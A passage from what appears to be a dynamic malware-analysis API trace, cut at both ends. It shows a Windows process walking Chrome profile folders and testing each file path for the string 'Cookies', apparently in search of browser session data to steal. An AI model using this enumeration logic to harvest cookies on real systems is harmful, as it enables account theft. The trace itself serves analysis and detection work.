HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0163.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="MANIFEST-000001" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" [0163.208] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.208] GetProcessHeap () returned 0x8e0000 [0163.208] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.208] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001", lpSrch="Cookies") returned 0x0 [0163.208] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.208] GetProcessHeap () returned 0x8e0000 [0163.208] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0163.208] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0163.208] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0163.209] VirtualQuery (in: lpAddress=0x925610, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.209] GetProcessHeap () returned 0x8e0000 [0163.209] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925610 | out: hHeap=0x8e0000) returned 1 [0163.209] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.209] GetProcessHeap () returned 0x8e0000 [0163.209] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0163.209] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extension State", cAlternateFileName="EXTENS~2")) returned 1 [0163.209] lstrcmpiW (lpString1="Extension State", lpString2=".") returned 1 [0163.209] lstrcmpiW (lpString1="Extension State", lpString2="..") returned 1 [0163.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.209] lstrlenW (lpString="\\") returned 1 [0163.209] GetProcessHeap () returned 0x8e0000 [0163.209] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0163.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0163.209] lstrlenW (lpString="Extension State") returned 15 [0163.209] GetProcessHeap () returned 0x8e0000 [0163.209] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925550 [0163.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0163.209] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.209] GetProcessHeap () returned 0x8e0000 [0163.209] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0163.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0163.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0163.209] lstrlenW (lpString="\\*.*") returned 4 [0163.209] GetProcessHeap () returned 0x8e0000 [0163.209] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925610 [0163.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0163.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*" [0163.209] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0163.210] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.210] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.210] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.210] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.210] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82556720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0163.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0163.211] lstrlenW (lpString="\\") returned 1 [0163.211] GetProcessHeap () returned 0x8e0000 [0163.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0163.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 92 [0163.211] lstrlenW (lpString="000003.log") returned 10 [0163.211] GetProcessHeap () returned 0x8e0000 [0163.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fcdb8 [0163.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="000003.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" [0163.211] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.211] GetProcessHeap () returned 0x8e0000 [0163.211] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.211] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", lpSrch="Cookies") returned 0x0 [0163.211] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.211] GetProcessHeap () returned 0x8e0000 [0163.211] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0163.211] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824d3190, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0163.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0163.211] lstrlenW (lpString="\\") returned 1 [0163.211] GetProcessHeap () returned 0x8e0000 [0163.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0163.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 92 [0163.211] lstrlenW (lpString="CURRENT") returned 7 [0163.211] GetProcessHeap () returned 0x8e0000 [0163.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x9257a0 [0163.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="CURRENT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" [0163.211] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.212] GetProcessHeap () returned 0x8e0000 [0163.212] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.212] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT", lpSrch="Cookies") returned 0x0 [0163.212] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.212] GetProcessHeap () returned 0x8e0000 [0163.212] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0163.212] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0163.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0163.212] lstrlenW (lpString="\\") returned 1 [0163.212] GetProcessHeap () returned 0x8e0000 [0163.212] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0163.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 92 [0163.212] lstrlenW (lpString="LOCK") returned 4 [0163.212] GetProcessHeap () returned 0x8e0000 [0163.212] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x9257a0 [0163.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="LOCK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" [0163.212] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.212] GetProcessHeap () returned 0x8e0000 [0163.212] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.212] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK", lpSrch="Cookies") returned 0x0 [0163.212] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.212] GetProcessHeap () returned 0x8e0000 [0163.212] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0163.212] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0163.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0163.212] lstrlenW (lpString="\\") returned 1 [0163.212] GetProcessHeap () returned 0x8e0000 [0163.212] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.212] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0163.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 92 [0163.213] lstrlenW (lpString="LOG") returned 3 [0163.213] GetProcessHeap () returned 0x8e0000 [0163.213] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x9257a0 [0163.213] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.213] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="LOG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" [0163.213] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.213] GetProcessHeap () returned 0x8e0000 [0163.213] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0163.213] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG", lpSrch="Cookies") returned 0x0 [0163.213] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.213] GetProcessHeap () returned 0x8e0000 [0163.213] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0163.213] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0163.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0163.213] lstrlenW (lpString="\\") returned 1 [0163.213] GetProcessHeap () returned 0x8e0000 [0163.213] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0163.213] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0163.213] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0163.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 